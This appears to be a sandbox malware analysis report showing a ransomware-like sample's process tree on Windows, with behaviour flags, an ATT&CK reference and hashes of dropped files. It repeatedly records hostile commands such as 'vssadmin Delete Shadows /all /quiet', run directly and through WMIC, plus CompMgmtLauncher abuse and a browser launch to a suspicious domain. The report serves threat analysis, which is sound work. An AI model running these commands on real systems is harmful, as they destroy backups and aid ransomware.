C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2504
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2236 CREDAT:275457 /prefetch:21⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2768
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:2696
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"1⤵PID:2964
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe1⤵
- Suspicious use of WriteProcessMemory
PID:2772
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:1860
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Suspicious use of WriteProcessMemory
PID:1900
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://5c5cf6f870b88a5024upywsch.uscatch.club/upywsch&2&33016245&84&369&12?1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2236
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1708
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe1⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:956
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1832
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2288
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1756
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"1⤵PID:884
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe1⤵
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:2644
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1728
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:900
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2152
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe1⤵PID:2168
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:1476
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:208
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
PID:2972
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1640
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
914B
MD5e4a68ac854ac5242460afd72481b2a44
SHA1df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA5125622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
Filesize252B
MD507e784e322d37556de9d5e3e300cd912
SHA19222ecf24a983f64500c97317fed8ecddf943324
SHA2564b1df956e041e408b59ab039978a62a1381c6966f162e8d21bb2001ab0857180
SHA51255736f3ebbc8514347a8c8d5b028d94cb5ca36b9d6354666a054434fd3c0b0ea5acba2379cb870b09ef081538c68108b34810d5077af7d531081b2ece285dba5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD5c385040a01cd46646739ff440ddc28ce
SHA12bb64a6e81ad9d5e06b1c54c82b2e337321b9c65
SHA256e31e52d7175064a913191f1cf164e9c33652c59819fc898f39302a4148099bab
SHA5127746957fd54ff18ca6370a7ee5ffbacaf11a0bcd244a209324355135a90282077d9d529ccc34b8a4e0b41ef9bae0e9369f345b5a9e66138fa4409c99ec37c8e5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
Filesize4KB
MD5da597791be3b6e732f0bc8b20e38ee62
SHA11125c45d285c360542027d7554a5c442288974de
SHA2565b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07
SHA512d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06